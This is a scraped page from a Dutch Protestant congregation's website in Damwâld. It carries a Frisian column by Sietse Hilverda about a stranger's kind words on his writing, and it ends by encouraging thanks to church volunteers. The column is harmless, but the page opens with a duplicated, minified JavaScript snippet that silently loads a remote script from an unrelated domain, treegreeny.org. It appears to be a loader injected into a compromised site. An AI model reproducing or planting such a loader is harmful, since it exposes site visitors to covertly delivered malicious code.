;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); In stek ûnder wetter krije…… - PKN Damwâld

In stek ûnder wetter krije……

Gepubliceerd op: maandag 30 december 2019

It oerkomt my gauris, foaral no’t ik yn de (gemeente-) politiek aktief bin. Soms sit der ek wolris in grûn fan wierheit yn, as jo in “stek ûnder wetter krije”, dan wurde jo efkes wekker skodde. Mar meastentiids krijst in bulte stront oer dy hinne, mar dan ferpakt yn “moaie wurden”. Neat oan fansels, mar it skynt der by de hearren hjoed de dei. Aldergelokkichst is de oare kant der ek noch yn it libben. It wie yn de sportseal by de fysio: der kaam in frou op my ôf en sei; Ik hear jo namme krekt fallen, bin jo miskien Sietse Hilverda? Dat kloppet hielendal, hoe no sa, frege ik har. De frou liet my witte dat se myn “stikjes” yn de paadwizer sa miste! Ik die har ùt de doeken dat de “stikjes” der nog wol wiene mar dan op de site fan pkndamwâld, al is it dan wat minder faak. Wy rekken oan’e praat en ik fertelde har dat it soms in poepetoer is om wat op papier te krijen! Hoe dan ek, de frou bedobbe my net ûnder skouderklopkes of kompliminten (sels bin ik der ek net sa struierich mei, (freegje it myn frou mar ris!) mar tusken de rigels troch spruts se har wurdearring wol ùt! Koartsein, m’n soe it ek in “stek ûnder wetter” neame kinne, mar dan mei in positieve ynslach, soks fielt dan wol noflik! Wolle jo ek ris in skouderklopke jaan yn it nije jier, tink dan ris oan al dy minsken die’t de Bêrnetsjerke op nivo hâlde, neam de 10-er tsjerke of Sign bygelyks, ik fyn it geweldich wat se dogge. Wat beskiedener kin fansels ek, dan sizze jo ris tsjin de minsken fan’e beamer, it lûd en it ljocht: it hat wolris minder west!

Sietse Hilverda

Columnist:Sietse

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns